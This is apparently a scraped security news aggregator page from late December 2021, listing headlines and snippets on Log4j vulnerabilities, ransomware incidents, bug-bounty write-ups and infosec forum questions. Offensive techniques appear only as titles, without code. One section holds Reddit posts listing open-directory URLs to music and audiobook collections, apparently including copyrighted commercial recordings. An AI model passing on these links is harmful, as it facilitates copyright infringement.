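    These vulnerabilities could allow remote attackers to bypass authentication requirements, tamper with metal detector configurations, and even execute arbitrary code on the devices.  ( 1 min )
    Hidden interfaces of a major automaker leaked repeatedly: how should we inventory company assets?
    How large in-house enterprises do asset inventory
    "2021 Enterprise Security Operations Practice Report" released: from passive defense to taking the initiative
    Shifting from passive to proactive, enterprise security operations systems have firmly seized the initiative.  ( 1 min )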
  • Open

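    If kubectl not found suddenly appears 😫
    kubectl, which I normally used without trouble, suddenly started returning not found. (It was probably caused by a brew upgrade at some point.) zsh: command not found: kubectl It was already installed, and reinstalling gave the same result. Looking around, this issue seems to occur when it was installed with homebrew. If you reinstall kubectl with brew and use brew link to connect the installed files to the homebrew prefix via symbolic links, you can use the command again. $ brew reinstall kubectl $ brew link --overwrite kubernetes-cli For reference, the homebrew prefix is the PATH location that homebrew uses.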

  • Open

    Why haven't African countries invested much in the Cybersecurity Industry?
    Most of the African countries don't know what Cybersecurity is!. Some know it but they have not yet faced a serious risk!. This is the main reason why countries like Uganda don't embrace Cybersecurity and Technology at large and this causes a serious threat to a country shortly because technology is becoming unavoidable! submitted by /u/Cyber_Catalyzer [link] [comments]  ( 1 min )
    Question about java deobfuscation HTB module
    hi all, I am doing the "Javascript deObfuscation" module on hackthebox platform (very very nice!) I read this: As previously mentioned, the above-used method of obfuscation is packing. Another way of unpacking such code is to find the return value at the end and use console.log to print it instead of executing it. Can anyone explain me this? Possibly with an example? Thankyou submitted by /u/g-simon [link] [comments]  ( 1 min )
    Nessus says IPMI hashes are disclosed, but metasploit's ipmi_dumphashes returns nothing?
    I see this fairly frequently during pentests where Nessus raises an issue about IPMI Hash Disclosure, but of course doesn't show any hashes. When using ipmi_dumphashes I get nothing in response. Does anyone know any other utilities to check for IPMI hash disclosure and confirm if Nessus is giving me a false positive? submitted by /u/security_intern [link] [comments]  ( 1 min )
    Someone is trying to access my accounts...what to do?
    I believe someone is in possession of my personal information and is trying to access my accounts. Over the last few days I have been prompted to confirm my identity in Venmo and Paypal. I also just received notice that someone is trying to access my Twitter account in Ecuador. ​ I have changed my Google password and all of my financial passwords. I have not detected any fraudulent activity on any of my cards, but am at a loss what to do next. Should I simply change every password I have? Is there a better course of action? ​ The only way I can think they may have gotten my information was is that I pirate tv shows on my personal computer. It recently blue screened and I had to wipe everything. ​ Pretty much at a loss for what to do at this step as it seems someone is attempting to access my account, but at this point hasn't been able to bypass 2fa or basic security questions. submitted by /u/LechronJames [link] [comments]  ( 2 min )
    Looking for advice and recommendations for RMM software.
    We're dealing with sensitive and juicy data, protected by strict regulations, in an environment where we could be targeted for being a little start up with access to some very interesting things. I'm of two minds. . . On the one hand, just the presence of RMM is a potential vuln (especially giving some cloud service admin access to my devices). On the other hand, I want to be able to keep track of stuff (and audit my users, who are scattered around the country, at least quarterly). I need an RMM solution for MacOS and Windows both that has a good track record and (hopefully) a reasonably open audit history. I'd feel more comfortable with something where I can host my own server, not have it call home somewhere in the cloud (I realise that's probably a nonstarter, at least as far as MacOS is concerned). I was moderately excited about Tactical RMM, but after what just happened with them, I'm a "hell no!" on that one. Any thoughts on this? submitted by /u/thebardingreen [link] [comments]  ( 1 min )
    Best password manager?
    Hey security folks, help me out to choose the best password manager. Let me know which password manager you are using and why? What's the best password manager between 1password vs dashlane vs bitWarden? submitted by /u/noob_bug_hunter [link] [comments]  ( 4 min )
  • Open

    PrintNightmare and SSH Tunnels
    submitted by /u/m_edmondson [link] [comments]
    Flagpro malware is threatening enterprises and is backed by Chinese hackers
    submitted by /u/Gengar-boy [link] [comments]  ( 1 min )
    How I built the PoC for the Log4j zero-day security vulnerability
    submitted by /u/melbadry9 [link] [comments]
  • Open

    open directories containing music (4)
    01 - Original Sound Track Tokusatsus - ddl.tokusatsu-fansub.fr > Musiques > Tokusatsus Collection MP3 OST e BGM > 01 - Original Sound Track Tokusatsus Index of /criticalmasscatania/data/media (inventati.org) Index of /mp3 (pinballnirvana.com) Index of /tunes (syer.net) Index of /Music Index of /ftp/MP3 (bahiabeachtenerife.com) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (3)
    http://wrobradio.com/mp3s/ http://www.crypthome.com/members/Belle/vwavvv/ http://www.ibiblio.org/pha/dawk/Audio/ http://www.crescentmoon.club/All%20Music/ http://files.sfenyc.com/Music/?C=M;O=A http://woodrosepsp.com/judy/MUSIC/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (2)
    http://www.captainspud.com/stuff/music/ http://cvltnation.com/wp-content/audio/ https://anorg.chem.uu.nl/people/staff/FrankdeGroot/woXS/ https://dl.msbmusic.ir/d1/1398/Music/09/ http://tka4.org/tka4/articles/Music%20Listening/sound/ https://www.iutbayonne.univ-pau.fr/~lopis/BBand/Divers/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    open directories containing music (1)
    https://www.acroche2.com/mid_jazz/ http://148.72.150.188/archive/access/audio/ http://91.121.145.85/panel/136/henk/Blue%20Note%20The%20Ultimate%20Jazz%20Collection/Blue%20Note%20-%20The%20Ultimate%20Jazz%20Collection%20-%20CD1/ http://pix.klunch.com:555/mp3/ http://www.doctorwhofanshop.com/mov/ https://ia801002.us.archive.org/27/items/tntvillage_381703/John%20Coltrane%20-%20Legacy%20%28Impulse%21%29%20%281955-67%29%20%28Disc%201%20-%20Harmonic%20%26%20Melodic%29/ submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    ARCHIVES OF INTERNET RADIO SHOWS. Music and interviews seemingly. Might be easier to check parent directory first.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Various operating system ISOs
    submitted by /u/Plastic_Preparation1 [link] [comments]
    An Audiobook for every novel in the Nero Wolfe detective series by Rex Stout
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Music. Hmm. Some of it is the original artists at least in the first directory. The rest seems to be covers and maybe original material by some french band. There is a trio mentioned in parent folder. But in open directory folders which have people's names, there are more than 3 folders. Whew.
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    classical music in some of the directories.
    submitted by /u/International_Milk_1 [link] [comments]
    Telegram bot-OD downloader
    I am thinking of creating a telegram bot that crawls and downloads OD, is that already done? Is it a good idea? And could I be legally accused with anything? submitted by /u/_NullPointerEx [link] [comments]  ( 3 min )
  • Open

    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guyz are doing well, Here is the story of how i am able to crash anyone’s mozilla firefox by just sending a single email… Continue reading on Medium »  ( 1 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi, Continue reading on Medium »  ( 1 min )
    Jet Protocol Upgrade Bug Patch Disclosure
    On Dec 21st, we performed an ad hoc upgrade to our mainnet program that introduced a critical vulnerability that was quickly discovered… Continue reading on Jet Protocol »  ( 1 min )
    How To Hack Any Website
    [PART -3 Exploiting Trust] Continue reading on System Weakness »  ( 12 min )
    LENOVO OPEN REDIRECTION
    Hello Hackers!! Continue reading on Medium »  ( 1 min )
    OTP bypass via response manipulation
    Hello everyone I’m Jan Jeffrie Salloman, I started bug hunting 1 year ago. This writeup is about an OTP bypass using response manipulation… Continue reading on Medium »  ( 1 min )
    Polygon Lack Of Balance Check Bugfix Postmortem — $2.2m Bounty
    Whitehat Leon Spacewalker reported a critical vulnerability in Polygon on December 3. Continue reading on Immunefi »  ( 4 min )
  • Open

    Log4j CVE-202144228
    Krisp disclosed a bug submitted by karthik86: https://hackerone.com/reports/1431624
    SQL Injection leads to retrieve the contents of an entire database.
    BlockDev Sp. Z o.o disclosed a bug submitted by u-itachi: https://hackerone.com/reports/1002641
  • Open

    Help with installing Autopsy
    submitted by /u/UserNo007 [link] [comments]  ( 1 min )
    Forensic Analysis of USB tripwire that shreds your LUKS Header
    submitted by /u/maltfield [link] [comments]  ( 1 min )
    Tips on GCFA (SANS FOR508) certification
    Hello everyone, I've just registered for GCFA (SANS FOR508). What are the major tips that anyone can share for this certification? One piece of feedback that I heard from my colleagues that took it a couple of months back was that the practice papers don't have much similarity to the actual exam. Which is kind of a concern as I have a GCIH (SANS SEC504) and my practice papers were very similar to the actual exam. Appreciate any feedback from anyone who has recently attempted the certification, thanks! submitted by /u/Writtensine6 [link] [comments]  ( 3 min )
  • Open

    SecWiki News 2021-12-29 Review
    Business security development insight report 2021 by ourren Consumer IoT security baseline by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

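    Raspberry Pi special issue --- setting up a Kali environment
    Pick up your dust-gathering Raspberry Pi and do something meaningful with it! Aimed at beginners who want to learn information security at low cost; let's get moving together!  ( 1 min )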
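    FreeBuf Morning Report | Online password manager LastPass hit by large-scale credential stuffing; court rules Haogou app violated privacy rights
    Global news 1. Log4j 2.17.1 now released, fixing a new remote code execution bug. Apache has released Log4j version 2.17.1, which fixes a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. [Foreign press - read the original] 2. Haogou app read the contents of users' phone clipboards without permission; court rules it violated privacy rights. While using the Haogou app, mobile user Xiao Lin (a pseudonym) found that the app had, without consent, been monitoring and collecting the phone's clip  ( 1 min )
    "Information security technology: Technical requirements for the design of cryptography applications in information systems" (draft for comments) released
    The draft for comments offers recommendations on techniques for designing cryptography application schemes for information systems, providing guidance and reference for carrying out such design.
    Data loss prevention market to reach USD 6.265 billion by 2026
    By 2026, the data loss prevention market will reach USD 6.265 billion.  ( 1 min )
    Risky streaming apps appear in Samsung's app store, posing security risks and involving infringement
    These apps disguise themselves as ShowBox, a pirated movie and TV application that has ceased operation, and have already triggered Play Protect security warnings on multiple users' devices.
    Collection of 48 questions on Classified Protection 2.0 and commercial cryptography application products (middle part)
    In the era of Classified Protection 2.0, in line with the development and application of information technology and the cybersecurity situation, the scheme's content has been continually enriched, the scope of protection expanded and supervisory measures improved, and the policies, standards and support system of the cybersecurity classified protection scheme have been progressively strengthened.  ( 1 min )
    In the cloud era, this is how enterprises can do cloud security auditing!
    In the cloud era, enterprises should combine their own security compliance requirements with the characteristics of the public cloud to define cloud security audit check items, and make effective use of public cloud configuration audit services to raise the level of automation of cloud auditing.  ( 1 min )
    Big news | [2021 China White Hat Survey Report] officially released
    In the future, white hats should try more vulnerability areas that they were previously unfamiliar with or not good at, and update their vulnerability-hunting knowledge and skills.  ( 1 min )
    Analysis of the principles behind the in-domain privilege escalation vulnerabilities CVE-2021-42287 and CVE-2021-42278
    In summary, this vulnerability was initially called nopac and is really an attack for the cross-domain case, with little practical significance in real engagements.  ( 3 min )
    Online password manager LastPass hit by large-scale credential stuffing
    Online password manager LastPass acknowledged that attackers carried out a large-scale credential stuffing attack against its users in an attempt to access their cloud-hosted password vaults.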
  • Open

    Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
    Strategically aged domain detection can capture domains registered by advanced persistent threats or likely to be used for network abuses. The post Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends appeared first on Unit42.
  • Open

    BountyHunter HackTheBox Walkthrough
    Bounty hunter is a CTF Linux machine with an Easy difficulty rating on the Hack the Box platform. So let’s get started and take a The post BountyHunter HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Log4 2.17 JDBCAppender RCE(CVE-2021-44832)
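    Yet… yet another one is out. The content was too long to cover all at once in the previous post, so I plan to split additional CVEs out one at a time. History of Log4j RCE [2021-12-10] CVE-2021-44228 (RCE) [2021-12-14] CVE-2021-45046 (DOS / RCE) [2021-12-18] CVE-2021-45105 (DOS) [2021-12-27] CVE-2021-44832 (RCE) Affected ≤2.17, ≤2.12.3, ≤2.3.1 The versions above are vulnerable. However, they are not unconditionally vulnerable: the attacker needs permission to modify the logging configuration file, so an additional factor such as MITM is required for the attack to succeed. So it is not a Critical issue like the previous RCEs, but Major(CVSS 6.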
  • Open

    Log4jscanner: A Log4j vulnerability filesystem scanner and Go package
    Article URL: https://github.com/google/log4jscanner Comments URL: https://news.ycombinator.com/item?id=29723953 Points: 3 # Comments: 0  ( 3 min )
  • Open

    CTF Write-Up: Shiftpocalypse
    CTF challenge available at ctf-mystiko.com.  ( 3 min )
    CTF Write-Up: Hell Yeah!
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    Story of a weird CSRF bug
    Heyyy Everyoneeee,  ( 5 min )
    Forensics — Memory Analysis with Volatility
    Recently, I’ve been learning more about memory forensics and the volatility memory analysis tool. To get some more practice, I decided to…  ( 6 min )
    Log4Shell Simplified : All you need to know about CVE-2021-44228
    Collection of all the required details to understand Log4shell (CVE-2021–44228 ) vulnerability  ( 4 min )
    TryHackme — Introduction to Django
    CTF  ( 2 min )
    Bug Bounty Tool List
    Bug Bounty Tool List Which are useful for Hunting  ( 1 min )
  • Open

    Implant.ARM.iLOBleed.a | Padvish Threats Database
    submitted by /u/dmchell [link] [comments]
  • Open

    OSINT Cheatsheet: A Mindmap for Your Investigation
    This is a guest post by Steve Hall (https://twitter.com/shall_1) Continue reading on Medium »

  • Open

    Red & Blue-Team Quick Reference Gitbooks
    Hi everyone! I would like to share with you one of my gitbooks, focused on DFIR, Malware and Blue-Team in general. It is a WIP in progress. I'm actually adding more and more things while I learn along the way. 📘 Hunter - Jorge Testa There you have my Red-Team version. WIP too. 📕 Tryharder - Jorge Testa Hope you like it! submitted by /u/J-Testa [link] [comments]  ( 1 min )
    Microsoft Defender for Identity security alert lateral movement playbook
    submitted by /u/dmchell [link] [comments]
  • Open

    Third Log4j RCE Vulnerability Discovered in Apache Logging Library [With Technical details & PoC]
    submitted by /u/Gorkha56 [link] [comments]
    DFIR or AppSec?
    Hi everyone, I'm currently a Computer Science student and I would love to work in cybersecurity. There are 2 roads that I want to explore and I was wondering if you could help me decide which career path to choose as I really like both of them equally: (1) Start as a SOC Analyst and specialize in DFIR. (2) Work for a couple of years as a software engineer, after that transition to AppSec. Thank you and really looking forward to your answers! submitted by /u/cyberprime24 [link] [comments]  ( 1 min )
    Most comprehensive(or better in another way) list of default creds?
    I can see there are a lot of sites that list default creds, but they seem to be missing a lot like default setting web apps. Usually it doesn't take too long to google, but not always. What are your favorite lists for this? Is it better to just google each time or have you found any gems out there? submitted by /u/Euphorinaut [link] [comments]  ( 1 min )
    "Pentesting" a friend's web app, it's a bit scary..
    Hey everyone! First of all I'm not a pentester, I'd like to be one one day but for now I remain a noob who is trying harder every day. Now that that's out of the way let me start.. So I met up with a friend of mine recently who had an idea for a web app and hired a company to develop it. It's still in development but the other day he showed me the progress and asked me for my general opinion on the idea, status of the website and since he also receives regular backups of the code, he asked me to take a quick look at it. It seemed to be built on top of WordPress, nothing fancy but since I'm interested in Pentesting and Web application security I took a quick glance at interesting files like login, etc... Now again, I'm not a web dev or have great skills in php or js but I can read some o…  ( 5 min )
    Has anyone ever read Kevin Mitnick’s The Art of Invisibility? How useful was the advice?
    It’s a book released in 2017 that details how to secure your OPSEC. A lot of 5 star reviews on amazon, can anyone summarize the chapters? There were 16. submitted by /u/Original_Ad_1103 [link] [comments]  ( 3 min )
    In what fields of InfoSec is there potential for entrepreneurship?
    I am currently a high school student passionate about InfoSec studying Network+ material, and as someone who wants to own a business one day I was interested in which specific areas of this field there is startup potential. Of course, I plan on gaining plenty of experience in jobs before contributing my own innovation so your answers will allow me to calibrate my learning/career path to be more effective for my goals. submitted by /u/Connect_Estate_8617 [link] [comments]  ( 4 min )
  • Open

    New Log4j2 vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-44832 Comments URL: https://news.ycombinator.com/item?id=29718845 Points: 97 # Comments: 41  ( 3 min )
    Important: Security Vulnerability CVE-2021-44832
    Article URL: https://logging.apache.org/log4j/2.x/ Comments URL: https://news.ycombinator.com/item?id=29718814 Points: 2 # Comments: 0  ( 5 min )
    Log4j Vulnerability Scanning Tool from Jfrog
    Article URL: https://github.com/jfrog/log4j-tools Comments URL: https://news.ycombinator.com/item?id=29715230 Points: 1 # Comments: 0  ( 6 min )
  • Open

    Intercepting Google CSE resources: automate Google searches with client-side generated URIs (for…
    Introduction Continue reading on Medium »  ( 11 min )
  • Open

    New Log4j CVE - CVE-2021-44832. Another JNDI RCE. Fixed in latest release.
    submitted by /u/emmainvincible [link] [comments]  ( 1 min )
    Turning bad SSRF to good SSRF: Websphere Portal
    submitted by /u/Mempodipper [link] [comments]
    IRIS - A web collaborative platform for incident response analysts allowing to share investigations at a technical level
    submitted by /u/Maijin [link] [comments]
    Pet surveillance with Falco
    submitted by /u/MiguelHzBz [link] [comments]
    Using laser speckle patterns to see keypresses etc.
    submitted by /u/anfractuosus [link] [comments]  ( 1 min )
    Integrating Canary Tokens with Microsoft Sentinel SIEM
    submitted by /u/m_rothe [link] [comments]
    PHP LFI with Nginx Assistance
    submitted by /u/dL2Hj4wR [link] [comments]  ( 1 min )
    V8 Heap pwn and /dev/memes - WebOS Root LPE
    submitted by /u/DavidBuchanan [link] [comments]
    Encoding.Tools (alternative to CyberChef and Burp Suite Encoder)
    submitted by /u/mehaase [link] [comments]
  • Open

    Hack Us Will You?
    Delorians, Continue reading on Medium »  ( 1 min )
    Astroport Boosts Bug Bounty to $3m, Takes Top Leaderboard Spot
    Astroport has just doubled its critical bug bounty reward from $1.5m to $3m, making it the largest bounty on Immunefi’s platform, beating… Continue reading on Immunefi »  ( 1 min )
    Hunting for Bugs in File Upload Feature:
    In this blog, I will be listing down some file upload Vulnerability such RCE, SSRF, CSRF, XSS and many more such vulnerabilities. Continue reading on Medium »  ( 4 min )
    SSRF in Align Technology, Inc.
    Hi everyone Align Technology, Inc. is a manufacturer of 3D digital scanners and the Invisalign clear aligners used in orthodontics.It is… Continue reading on Medium »  ( 1 min )
    [Campaign] — HappyLand testnet invitation!
    HappyLand Testnet will arrive at the end of December and we are super thrilled to welcome you. This is an opportunity to let you imagine… Continue reading on Medium »  ( 2 min )
    Bypassing HttpOnly with phpinfo file
    While doing Web Application assessment with Higgsx, We found stored Cross-Site Scripting(XSS) which was a nice finding but we could not… Continue reading on Medium »  ( 1 min )
    CVE-2021-38314 Leads to Sensitive Information Disclosure
    Hello Hackers! Continue reading on Medium »  ( 1 min )
    How having a student mail can help you in Info-sec.
    Hello Everyone, I’m Vishal & It’s my first ever blog . So if you found any grammatical error or something missing don’t pardon me, Instead… Continue reading on Medium »  ( 5 min )
    Bounty Evaluation GitHub = $15,000 US Dollars | Rate Limit
    I found the bug on GitHub website where, I bypassed the login authentication. In this walk through I will show it was done. Let’s… Continue reading on Medium »  ( 2 min )
    Bug Report Update!
    We are very grateful for the overwhelming support our community has shown for our ongoing testnet & bugbounty programme. Our bugbounty… Continue reading on Medium »  ( 2 min )
    Bug Bounty Programs for Blockchain Projects
    The list of methods and strategies applied by hackers to compromise the security of their targets is constantly expanding and they… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2021-12-28 Review
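    Series: Evolving Advanced Threat Governance (Part 4) by ourren Series: Evolving Advanced Threat Governance (Part 3) by ourren Series: Evolving Advanced Threat Governance (Part 2) by ourren Series: Evolving Advanced Threat Governance (Part 1) by ourren SecWiki Weekly (Issue 408) by ourren Transparency vs. national security? Calls to reform the US VEP policy rise again by ourren Vulnerability disclosure is a wicked problem: a brief introduction to Coordinated Vulnerability Disclosure (CVD) by ourren THINE: Representation learning for temporal heterogeneous information networks by ourren For more of the latest articles, visit SecWiki  ( 2 min )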
  • Open

    Dell Driver EoP (CVE-2021-21551)
    submitted by /u/nanabingies [link] [comments]
  • Open

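    [Security Advisory] Multiple backdoor vulnerabilities in Auerswald COMpact 5500R PBX firmware...
    RedTeam Pentesting recently disclosed multiple backdoor vulnerabilities in the Auerswald COMpact 5500R PBX firmware. Attackers can use these back...  ( 1 min )
    [Security Advisory] Apache APISIX Dashboard authentication bypass vulnerability (C...
    An authentication bypass vulnerability in Apache APISIX Dashboard recently surfaced online; attackers can use it to bypass the authentication process and, through...  ( 1 min )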
  • Open

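    A first look at the closed beta of HFish, a free enterprise-grade Chinese-made honeypot
    I was lucky enough to get closed-beta access from a member of the HFish product team, so here are my impressions from using it, along with some deployment approaches. There is an Easter egg at the end.  ( 1 min )
    Goodbye Script Kiddie series | Java Security (1): Java local and remote debugging techniques
    The first installment of the course series mainly covers Java security topics  ( 1 min )
    [Original] VulnHub target machine walkthrough: CyNix: 1
    VulnHub target machine walkthrough: CyNix: 1  ( 1 min )
    World's largest photo service company hit by ransomware attack; pirated copies of the new Spider-Man film contain a mining trojan | Global cybersecurity highlights for December 28
    Albanian prime minister apologizes for data leak
    After the personal data of hundreds of thousands of Albanian citizens was leaked on the internet, the Albanian prime minister publicly apologized for the incident.
    Apache HTTP Server 2.4.52 released, fixing critical vulnerabilities
    Users and administrators are advised to review the Apache announcement and update their versions as soon as possible to avoid unnecessary exposure to potential attacks.  ( 1 min )
    FreeBuf Morning Briefing | Nearly 70% of internet users feel manipulated by algorithms; Albanian prime minister apologizes for data leak
    The "Chinese Public 'Big Security' Perception Report" published by Peking University's Center for Internet Development Research shows that nearly 70% of the public say they are worried about leaks of their accounts and personal information.  ( 1 min )
    QNAP NAS devices hit by ransomware attacks over Christmas
    The eCh0raix ransomware attackers all appear to have created an account in the system administrators group and used it to encrypt all files on the NAS system.  ( 1 min )
    Logistics giant DW Morgan exposed 100 GB of customer data
    The Website Planet security team found a misconfigured Amazon S3 bucket containing about 2.5 million files totaling more than 100 GB.  ( 1 min )
    Shutterfly, the world's largest photo service company, hit by Conti ransomware attack
    Founded in 1999, Shutterfly claims its online photo storage is the largest in the world, holding 70 PB of data and about 1.6 billion images.  ( 1 min )
    Anti-cracking for Unity games: code cracking and asset theft, starting from the attack risks
    This article focuses on anti-cracking, describing these security risks and how to upgrade Unity games with comprehensive, matrix-style protection.  ( 1 min )
    Swagger Injection attacks on API definition files
    Developers should treat API definition files as an untrusted input source and add corresponding security controls to the automated code generation step.  ( 1 min )
    Analysis of security requirements for the 5G SMF and UPF network elements based on free5gc + UERANSIM
    This article analyzes, at the packet and code level, the security requirements for the SMF and UPF network elements defined in the 3GPP Security Assurance Specification (SCAS).  ( 6 min )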
  • Open

    Looking back at 2021 in cybersecurity with Netsparker
    As 2021 draws to a close, it is time for our customary round-up of the year’s most popular and relevant posts on the Netsparker blog, with a sprinkling of last-minute news and predictions for the coming year. READ MORE  ( 4 min )
  • Open

    How I Bypassed Netflix Profile Lock?
    Hi hackers,  ( 3 min )
    Analysis of Poetrat malware
    Hashes  ( 3 min )
    TryHackme LFI Writeup
    How to find and exploit LFI  ( 3 min )
    How I hacked into one of India’s biggest online book stores(RCE and more)
    This article is going to be about how I found my 1st RCE on one of India’s biggest e-commerce sites(+ a few more bugs).  ( 5 min )
  • Open

    google drive movie link
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    186 persiangig OD Sites Potential NSFW

  • Open

    Windows resolves/"connects" to external IP even without internet access?
    I was poking around in my router the other day and found something I can't really understand: my Windows machine tried to connect to an external IP address (13.?.?.?) when there was no internet access and no DNS. My modem's internet cable was disconnected and both modem and router were rebooted before I powered up the Windows machine. All DNS caches should be empty. The router connections page shows 1 connection from my Windows machine to 13.?.?.? with status SYN_SENT. Of course, it didn't connect, but how did it know what external IP to try without DNS? The IP is a Microsoft one but I didn't write down what it was (and I didn't save search history) since I initially didn't think it was strange. I tried repeating the same thing several times, but never saw anymore external IPs (but a bunch of 198.x.x.x which is what I'd expect when internet is down). The only difference the first time is that it was installing a previously downloaded Windows update. Is this unusual? Is MS known to go directly to IP addresses like this? This machine only has Windows installed and drivers from Windows Update, so not much on here. submitted by /u/Vivid-Elk-8337 [link] [comments]  ( 2 min )
    Linux servers security
    Hi, We have 100+ Linux servers running with apache/tomcat and Nginx, and a few servers are public-facing with ip control. I am trying to see if any open source tool to scan all 100+ servers on a daily basis and report if any vulnerabilities. Thanks. submitted by /u/Prestigious-Yam-3510 [link] [comments]  ( 1 min )
    Best IT backgrounds to prepare for InfoSec
    I am currently a computer science student and I want to pursue a career in cybersecurity but I know that in order to get into security I will need some kind of experience before I can get a job in the field. I'm just wondering what are the best IT backgrounds to have or things that I should focus on that would help me develop skills needed for security careers. I know it depends on what kind of focus I want in security and for now I'm thinking more towards the defensive side like engineer maybe but I would prefer having answers based in either roles (attack and defense). So to rephrase it a bit better I wanna know what are the best temporary jobs that I could do to develop skills needed to switch into security (soft dev, web dev, data sci, etc...)? submitted by /u/iTsObserv [link] [comments]  ( 7 min )
  • Open

    Playing around COM objects - PART 1
    submitted by /u/dmchell [link] [comments]
    Dumping LSASS with Duplicated Handles
    submitted by /u/dmchell [link] [comments]
    snovvcrash/NimHollow: Nim implementation of Process Hollowing using syscalls (PoC)
    submitted by /u/dmchell [link] [comments]
  • Open

    Winning the Impossible Race – An Unintended Solution for Includer’s Revenge / Counter (hxp 2021)
    submitted by /u/Caustic66 [link] [comments]
    remote Chaos Computer Congress Streaming
    submitted by /u/mubix [link] [comments]
    A Deep Dive into DoubleFeature: Equation Group's Post-Exploitation Dashboard
    submitted by /u/Megabeets [link] [comments]
  • Open

    Why did my last movie post dissappear?
    submitted by /u/International_Milk_1 [link] [comments]
    If you'll allow me-for movie or tv show fans.
    There might be one person out there who doesn't know this. So let's say you download a movie, expecting it to be in the english language, but find that Harrison Ford is speaking Persian, and it doesn't even sound like Mr F In whatever player you use, go to the audio option , and check if there is alternative track. To make sure there is an english language track, before downloading, copy the link of the movie/tv episode, and open in your player. Then you can check before downloading. submitted by /u/International_Milk_1 [link] [comments]  ( 2 min )
    I'd like to make a motion for a couple of new flairs: "Junk Science" and "Conspiracy"
    submitted by /u/brother_p [link] [comments]  ( 1 min )
  • Open

    Ethical Hacking Roadmap and Resources
    Checklist for the things that one has to learn while learning Linux: Shell, Navigation, File System, Redirection, Permissions, Processes… Continue reading on Medium »  ( 4 min )
    Full account takeover vulnerability in Minecraft
    Continue reading on Medium »  ( 2 min )
    WEB VULNERABILITIES 7.0
    C R O S S - S I T E S SCRIPTING Continue reading on Medium »  ( 6 min )
    OSINT Research With Recon-ng
    This piece goes over the basics of Recon-ng and how to use it to facilitate OSINT research! I’ll be covering two modules: google_site_web… Continue reading on Medium »  ( 4 min )
    Unlucky Story, Judge Duplicate, and Only Get a Thank You. But It makes Me smile.
    This is from my local bounty program in my country, Indonesia. I found some vulnerabilities in an e-commerce website and I think it would… Continue reading on Medium »  ( 1 min )
    From Simple Recon to Reflected XSS
    whoami Continue reading on Medium »  ( 2 min )
    How I Bypassed Netflix Profile Lock?
    Hi hackers, Continue reading on InfoSec Write-ups »  ( 2 min )
    HOW I GOT MY SECOND SWAG
    Hi everyone! Hope you all are doing good. In this article i am going to show you how i got my second swag from Ivanti by reporting an open… Continue reading on Medium »  ( 2 min )
    DOM Based XSS
    DOM based XSS (cross site scripting) is a client side vulnerability that arises when the javascript takes data from user controllable… Continue reading on Medium »  ( 3 min )
  • Open

    Help with Autopsy on Mac
    Hi, I need to use Autopsy to analyse an E01 image for my project but am struggling to get it set up on my Mac (running Mojave). I downloaded the .zip file from autopsy and have all the files but can't seem to get the GUI running. I installed it via 'brew' but at the end of the install it said error Xcode version too low. So I don't know if it has installed properly. Any help would be appreciated. Thanks submitted by /u/UserNo007 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2021-12-27 Review
    No news updates yet today. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    TryHackMe: OhSINT — WriteUp
    Is your information safe enough on internet? Continue reading on Medium »  ( 4 min )
    OSINT Series … Part-1
    What is OSINT ? Continue reading on Medium »  ( 2 min )
  • Open

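    FreeBuf Morning Briefing | Ubisoft reported to be deleting inactive paying players' accounts; White House invites vendors to discuss strengthening open-source security
    An anonymous user found that his game account on Ubisoft's platform had been deleted; he had earlier received a warning email requiring him to log in within 30 days or the account would be permanently deleted.  ( 1 min )
    Surrounded on all sides, deadbeat debtors exposed: a protracted war against the anti-debt-collection black market
    The financial industry's long-running war against the anti-debt-collection black market has finally reached deep water.  ( 1 min )
    Office of the Central Cyberspace Affairs Commission releases the "14th Five-Year Plan for National Informatization"
    The Plan is an important part of the national planning system for the 14th Five-Year Plan period and serves as the action guide for informatization work across regions and departments during that period.
    MIIT and the Standardization Administration of China jointly issue the "Guidelines for the Construction of the Industrial Internet Comprehensive Standardization System (2021 Edition)"
    The Guidelines state that by 2023 the industrial internet standards system will continue to improve, with at least 15 foundational common standards developed covering terminology and definitions, general requirements, supply chain/industry chain, talent and other areas.
    "Guangzhou SASAC Data Security Compliance Management Guide for Supervised Enterprises (Trial 2021 Edition)" released
    The Guide refines and elaborates the requirements of higher-level law, becoming the first compliance operations guide issued by a local state-owned assets regulator specifically for the data compliance domain.
    Building a financial-loss prevention and control system for the Yidun SaaS platform
    Business security mainly provides authentication-type services, including CAPTCHAs, number logs and information verification. Mobile security protects customers' applications through hardening and other means to prevent reverse engineering and cracking.  ( 1 min )
    Who moved my printer?
    By October 2021 the problem had become serious: large numbers of Windows 10 users who installed the October patches found they could no longer use network printers normally.  ( 1 min )
    Advantages of the token mechanism over the cookie mechanism
    When a client frequently requests data from the server, the server has to query the database just as frequently for the username and password and compare them to decide whether they are correct and respond accordingly; it is against this background that tokens emerged. Simply  ( 1 min )
    Web application attacks are surging: time to protect your APIs!
    Since October 2019, web application attacks against UK businesses have increased by 251%.  ( 1 min )
    Tech share | Common DDoS attack types and defensive measures
    DDoS attacks will be characterized by high frequency, rapid growth and large traffic volumes, and the threat they pose to network security will keep growing, so putting DDoS protection in place can no longer be delayed.  ( 1 min )
    Ransomware may become the biggest threat of 2022; French IT services company hit by ransomware attack | Global cybersecurity highlights for December 27
    Security experts have discovered a new banking trojan spread through fake Google Play store pages. Strangers pretend to present the app of a well-known bank.  ( 1 min )
    Online "attendance clock-in tools" are actually cheating tools from the black and gray market
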